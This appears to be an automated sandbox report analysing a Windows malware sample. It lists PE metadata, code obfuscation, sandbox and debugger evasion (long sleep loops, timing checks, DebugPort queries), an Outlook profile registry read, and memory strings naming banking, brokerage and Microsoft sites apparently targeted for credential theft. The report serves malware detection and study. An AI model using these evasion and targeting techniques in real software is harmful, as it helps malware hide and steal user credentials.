Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: GJRX21GBj3.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: GJRX21GBj3.exe Static file information: File size 1951744 > 1048576
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: GJRX21GBj3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: GJRX21GBj3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GJRX21GBj3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
PE file contains sections with non-standard names
Source: GJRX21GBj3.exe Static PE information: section name: .managed
Source: GJRX21GBj3.exe Static PE information: section name: hydrated
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004017BF push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0040A8C2 push ss; iretd 4_2_0040A921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041A881 push esp; iretd 4_2_0041A882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041E8B7 push ss; ret 4_2_0041E8BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004051A1 push ebp; ret 4_2_004051A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004019BF push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401B31 push ds; iretd 4_2_00401B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00403500 push eax; ret 4_2_00403502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041CD8C push edx; iretd 4_2_0041CD8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00407643 pushfd ; iretd 4_2_0040765A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00407638 pushfd ; iretd 4_2_0040765A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041A763 push esi; iretd 4_2_0041A767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058809AD push ecx; mov dword ptr [esp], ecx 4_2_058809B6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036809AD push ecx; mov dword ptr [esp], ecx 7_2_036809B6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E57260 push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E57247 push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5B3B4 push ss; ret 7_2_02E5B3BA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E473BF push ss; iretd 7_2_02E4741E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5737E push esp; iretd 7_2_02E5737F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E620DD push cs; ret 7_2_02E620DE
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E44140 pushfd ; iretd 7_2_02E44157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E44135 pushfd ; iretd 7_2_02E44157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5711C push esi; iretd 7_2_02E57264
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E60BB3 push cs; ret 7_2_02E60BB4
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E59889 push edx; iretd 7_2_02E5988A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5FE8D push es; iretd 7_2_02E5FE8E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E41C9E push ebp; ret 7_2_02E41C9F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03494072 push eax; iretd 7_2_03494078
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03499808 push ebx; ret 7_2_0349989F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_034A2822 push eax; ret 7_2_034A2824
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03490E84 push ecx; retf 7_2_03490E85
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\findstr.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Memory allocated: 29B95880000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 2128 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 7845 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\findstr.exe API coverage: 2.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep count: 2128 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep time: -4256000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep count: 7845 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe TID: 6208 Thread sleep time: -15690000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe TID: 1856 Thread sleep time: -65000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose, 7_2_02E5BF10
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562760 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask, 0_2_00007FF658562760
Source: H0840I45.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3924911559.000000000141A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: H0840I45.7.dr Binary or memory string: discord.comVMware20,11696428655f
Source: H0840I45.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: GJRX21GBj3.exe Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: H0840I45.7.dr Binary or memory string: global block list test formVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: H0840I45.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: H0840I45.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: H0840I45.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: H0840I45.7.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: H0840I45.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: H0840I45.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: H0840I45.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: H0840I45.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: H0840I45.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: H0840I45.7.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: H0840I45.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: H0840I45.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: firefox.exe, 0000000B.00000002.2629405691.0000016FA869D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK?+P
Source: H0840I45.7.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: H0840I45.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: H0840I45.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD1C0 rdtsc 4_2_058FD1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00417A33 LdrLoadDll, 4_2_00417A33
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B4588 mov eax, dword ptr fs:[00000030h] 4_2_058B4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h] 4_2_0590B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590B594 mov eax, dword ptr fs:[00000030h] 4_2_0590B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587758F mov eax, dword ptr fs:[00000030h] 4_2_0587758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587758F mov eax, dword ptr fs:[00000030h] 4_2_0587758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587758F mov eax, dword ptr fs:[00000030h] 4_2_0587758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882582 mov eax, dword ptr fs:[00000030h] 4_2_05882582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882582 mov ecx, dword ptr fs:[00000030h] 4_2_05882582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE59C mov eax, dword ptr fs:[00000030h] 4_2_058BE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h] 4_2_058A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h] 4_2_058A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h] 4_2_058A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h] 4_2_058A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15A9 mov eax, dword ptr fs:[00000030h] 4_2_058A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059135BA mov eax, dword ptr fs:[00000030h] 4_2_059135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059135BA mov eax, dword ptr fs:[00000030h] 4_2_059135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059135BA mov eax, dword ptr fs:[00000030h] 4_2_059135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059135BA mov eax, dword ptr fs:[00000030h] 4_2_059135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F5BE mov eax, dword ptr fs:[00000030h] 4_2_0593F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h] 4_2_059005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h] 4_2_059005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059005A7 mov eax, dword ptr fs:[00000030h] 4_2_059005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AF5B0 mov eax, dword ptr fs:[00000030h] 4_2_058AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h] 4_2_058A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A45B1 mov eax, dword ptr fs:[00000030h] 4_2_058A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h] 4_2_059535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h] 4_2_059535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h] 4_2_059535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h] 4_2_058BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h] 4_2_058BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B55C0 mov eax, dword ptr fs:[00000030h] 4_2_058B55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A95DA mov eax, dword ptr fs:[00000030h] 4_2_058A95DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058865D0 mov eax, dword ptr fs:[00000030h] 4_2_058865D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_058BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_058BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059555C9 mov eax, dword ptr fs:[00000030h] 4_2_059555C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD5D0 mov eax, dword ptr fs:[00000030h] 4_2_058FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD5D0 mov ecx, dword ptr fs:[00000030h] 4_2_058FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h] 4_2_058BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h] 4_2_058BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058825E0 mov eax, dword ptr fs:[00000030h] 4_2_058825E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_058AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h] 4_2_058A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B7505 mov eax, dword ptr fs:[00000030h] 4_2_058B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B7505 mov ecx, dword ptr fs:[00000030h] 4_2_058B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05954500 mov eax, dword ptr fs:[00000030h] 4_2_05954500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955537 mov eax, dword ptr fs:[00000030h] 4_2_05955537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h] 4_2_058AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h] 4_2_058AE53E
